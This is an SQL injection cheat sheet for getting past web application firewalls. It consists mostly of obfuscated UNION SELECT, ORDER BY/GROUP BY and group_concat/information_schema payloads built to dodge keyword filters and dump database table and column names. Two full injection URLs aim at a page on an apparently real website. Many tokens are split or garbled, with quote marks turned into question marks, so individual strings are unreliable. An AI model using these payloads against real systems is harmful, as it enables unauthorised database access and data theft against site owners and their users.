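SQLi WAF bypass cheat sheet

The strings below are variants of `UNION SELECT`, `ORDER BY` / `GROUP BY`, and `group_concat` / `information_schema` lookups. They are rewritten with mixed case, inline and MySQL versioned comments (`/*!50000 ... */`), URL and double-URL encoding, alternative whitespace bytes, and nested keywords. Keyword filters such as `/union\s+select/i` do not match them unless the WAF decodes and normalises the input before matching. The filter is therefore only a secondary control; the application itself needs parameterised queries.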

2019-08-25 03:21:52 -0400
WAF Bypass Cheat Sheet Union Select +union+distinct+select+ +union+distinctROW +select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ +/*!50000UnIoN*/ /*! 50000SeLeCt aLl*/+ +/*!u%6eion*/+/*!se %6cect*/+ /**/uniUNIONon/**/ aALLll/**/selSELECTect/ **/ 1%')and(0)union(select (1),version(),3,4,5,6)% 23%23%23 /*!50000%55nIoN*/+/*! 50000%53eLeCt*/ union /*!50000%53elect*/ %55nion %53elect +--+Union+--+Select+-- + +UnIoN/*&a=*/SeLeCT/ *&a=*/ id=1+?UnI?On?+'SeL? ECT? id=1+'UnI'||'on'+SeLeCT' UnIoN SeLeCt CoNcAt (version())-- uNiOn aLl sElEcT uUNIONnion all sSELECTelect /*union*/union/*select*/ select+1,2,3/* /*uniXon*/union/ *selXect*/select+1,2/* un/**/ion+sel/**/ect + #1q%0Aunion all#qa %0A#%0Aselect union /*!select*/+ union/**/select/**/ /**/union/**/select/**/ /**/union/*! 50000select*/ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/uniUNIONon/**/ selSELECTect/**/ /**/uniUNIONon/**/ aALLll/**/selSELECTect/ **/ /**//*!union*//**//*! select*//**/ /**/UNunionION/**/ SELselectECT/**/ /**//*UnIOn*//**// *SEleCt*//**/ /**//*U*//*n*//*I*// *O*//*n*//**//*S*// *E*//*l*//*e*//*C*// *t*//**/ /**/UNunionION/**/all/ **/SELselectECT/**/ /**//*UnIOn*//**/all/ **//*SEleCt*//**/ /**//*U*//*n*//*I*// *O*//*n*//**//*all*// **//*S*//*E*//*l*// *e*//*C*//*t*//**/ uni %20union%20/*!select*/ %20 union%23aa%0Aselect union+distinct+select+ union+distinctROW+select + /*!20000%0d%0aunion*/ +/*!20000%0d%0aSel Ect*/ %252f%252a*/UNION %252f%252a /SELECT %252f%252a*/ %23sexsexsex%0AUnIOn %23sexsexsex%0ASeLecT + /*!50000UnIoN*/ /*! 50000SeLeCt aLl*/+ /*!u%6eion*/+/*!se %6cect*/+ 1%?)and(0)union(select (1),version(),3,4,5,6)% 23%23%23 /*!50000%55nIoN*/+/*! 50000%53eLeCt*/ union /*!50000%53elect*/ +%2F**/+Union/*! 
select*/ %55nion %53elect +?+Union+?+Select+?+ +UnIoN/*&a=*/SeLeCT/ *&a=*/ uNiOn aLl sElEcT uUNIONnion all sSELECTelect union(select(1),2,3) union (select 1111,2222,3333) union (/*!/**/ SeleCT */ 11) %0A%09UNION%0CS ELECT%10NULL% /*!union*//*?*//*!all*// *?*//*!select*/ union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A1% 2C2%2C union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa %0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a union(select (1),(2),(3),(4), (5)) UNION(SELECT(co lumn)FROM(table)) id=1+?UnI?On?+?SeL? ECT? id=1+?UnI?||?on? +SeLeCT? union select 1?+%0A,2?+ %0A,3?+%0A etc ? /*!00000Union*/ /*! 00000Select*/ /*!50000%55nIoN*/ /*! 50000%53eLeCt*/ %55nion %53elect %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW +select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*! 50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ + #?uNiOn + #?sEleCt + #?1q %0AuNiOn all#qa %0A#%0AsEleCt /*!%55NiOn*/ /*! %53eLEct*/ /*!u%6eion*/ /*!se %6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f** %2fselect union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A REVERSE(noinu)+REVERSE (tceles) /*--*/union/*--*/select/ *--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/ **/ +%2F**/+Union/*! select*/ /**//*!union*//**//*! select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW +select+ uNiOn aLl sElEcT UNIunionON+SELs electECT /**/union/*! 50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni/*!20000%0d%0auni on*/+/*!20000%0d%0aSel Ect*/ %252f%252a*/UNION %252f%252a /SELECT %252f%252a*/ %0A%09UNION%0CS ELECT%10NULL% /*!union*//*--*//*! 
all*//*--*//*!select*/ union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A1% 2C2%2C /*!20000%0d%0aunion*/ +/*!20000%0d%0aSel Ect*/ +UnIoN/*&a=*/SeLeCT/ *&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa %0A#%0Aselect union(select (1),(2),(3),(4), (5)) UNION(SELECT(co lumn)FROM(table)) %23xyz%0AUnIOn%23xyz %0ASeLecT+ %23xyz%0A%55nIOn %23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa %0A#%0AsEleCt /**//*U*//*n*//*I*// *o*//*N*//*S*//*e*// *L*//*e*//*c*//*T*/ %0A/**//*! 50000%55nIOn*// *yoyu*/all/**/%0A/*! %53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn %23sexsexs ex%0ASeLecT + +union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A1% 2C2%2C /*!f****U%0d%0aun ion*/+/*!f****U%0d %0aSelEct*/ +%23blobblobblob %0aUnIOn%23blobblobblob %0aSeLe cT+ /*!blobblobblob%0d %0aunion*/+/*! blobblobblob%0d %0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/ *&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +?UnI?On?+'SeL?ECT? +uni on+sel ect+ +/*!UnIoN*/+/*! SeLeCt*/+ /*!u%6eion*/ /*!se %6cect*/ uni%20union%20/*! select*/%20 union%23aa%0Aselect /**/union/*! 50000select*/ /^.*union.*$/ / ^.*select.*$/ /*union*/union/*select*/ select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d %0a UNION/*&test=1*/ SELECT/*&pwn=2*/ un?+un/**/ion+se/**/ lect+ +UNunionION+SEs electLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f %252a /select%252f%252a */ /%2A%2A/union/%2A%2A/ select/%2A%2A/ %2f**%2funion%2f** %2fselect%2f**%2f union%23foo*%2F*bar %0D%0Aselect%23foo%0D %0A /*!UnIoN*/SeLecT+ Union Select by PASS with Url Encoded Method: %55nion(%53elect) union%20distinct%20select union%20%64istinctRO %57%20select union%2053elect %23?%0auion%20?%23? 
%0aselect %23?zen?%0Aunion all %23zen%0A%23Zen %0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc %74%20%73elect uni%6fn distinct%52OW s %65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c %65%63%7 Cheat Sheet of Bypassing Of Order by And Group By order by/**_**/ /*!12345order*/ /*! 12345by*/ ) order by 1-- - ') order by 1-- - ')order by 1%23%23 %')order by 1%23%23 Null' order by 100--+ Null' order by 9999--+ ')group by 99-- - 'group by 119449-- - 'group/**/by/ **/99%23%23 Concat And Group_concat By Pass cheat Sheet :: /*!12345group_concat*/ (/*!12345table_name*/) /*!50000group_concat*/ (/*!50000table_name*/) /*!GrOuP_ConCaT*/() /*!12345GroUP_ConCat*/ () /*!50000gRouP_cOnCaT*/ () /*!50000Gr%6fuP_c %6fnCAT*/() /*!group_concat*/() gRoUp_cOnCAt() group_concat(/*!*/) group_concat(/*! 12345table_name*/) group_concat(/*! 50000table_name*/) /*!group_concat*/(/*! 12345table_name*/) /*!group_concat*/(/*! 50000table_name*/) unhex(hex(group_concat (table_name))) unhex(hex(/*! group_concat*/(/*! table_name*/))) unhex(hex(/*! 12345group_concat*/ (table_name))) unhex(hex(/*! 12345group_concat*/(/*! table_name*/))) unhex(hex(/*! 12345group_concat*/(/*! 12345table_name*/))) unhex(hex(/*! 50000group_concat*/ (table_name))) unhex(hex(/*! 50000group_concat*/(/*! table_name*/))) unhex(hex(/*! 50000group_concat*/(/*! 50000table_name*/))) CONVERT(group_concat (table_name)+USING +latin1) CONVERT(group_concat (table_name)+USING +latin2) CONVERT(group_concat (table_name)+USING +latin3) CONVERT(group_concat (table_name)+USING +latin4) CONVERT(group_concat (table_name)+USING +latin5) convert(group_concat (table_name)+using+ascii) convert(group_concat(/*! table_name*/)+using +ascii) convert(group_concat(/*! 12345table_name*/ )+using+ascii) convert(group_concat(/*! 50000table_name*/ )+using+ascii) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3 a3a,version() CONCAT_WS(CHAR( 32,58,32),version(),) How to By Pass Tables::: group_concat(/*! table_name*/) +/*!froM*/ /*! 
InfORmaTion_sc Hema*/.tAblES? - /*!froM*/ /*! InfORmaTion_sc Hema*/.tAblES /*! WhERe*//*! TaBle_ScHEmA*/=schEMA ()? /*!From*/+ %69nformation_schema./ **/tAblES+/*! 50000Where*/+/*! %54able_ScHEmA*/ =schEMA()? - How to By Pass Columns::: group_concat(/*! column_name*/) +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*! tAblE_naMe*/=hex table /*!From*/+ %69nformation_schema./ **/columns+/*! 50000Where*/+/*! %54able_name*/=hex table/*!froM*/ table? - URL enCoded By passing Table and columns:: (select+group_concat(/*! table_name*/)+/*!From*/ +%69nformation_schema./ **/tAblES+/*! 50000Where*/+/*! %54able_ScHEmA*/ =schEMA()) (select+group_concat(/*! column_name*/)+/*! From*/+%69nformation_s chema./**/columns+/*! 50000Where*/+/*! %54able_name*/=hex table) like http://www.marinaplast. com/page.php?id=-13 union select 1,2,(select +group_concat(/*! table_name*/)+/*!From*/ +%69nformation_schema./ **/tAblES+/*! 50000Where*/+/*! %54able_ScHEmA*/ =schEMA()),4,5 ? illegal mix of Collations ByPass :: unhex(hex(Concat (Column_Name,0 x3e,Table_schem a,0x3e,table_Name))) /*!from*/ information_sche ma.columns/*!where*/ column_name%20/*!like*/ char(37,%20112,%2097, %20115,%20115,%2037) http://www.marinaplast. com/page.php?id=-13 union select 1,2,unhex(hex (Concat(Column_Na me,0x3e,Table_s chema,0x3e,tabl e_Name))),4,5 /*!from*/ information_sche ma.columns/*!where*/ column_name%20/*!like*/ char(37,%20112,%2097, %20115,%20115,%2037)?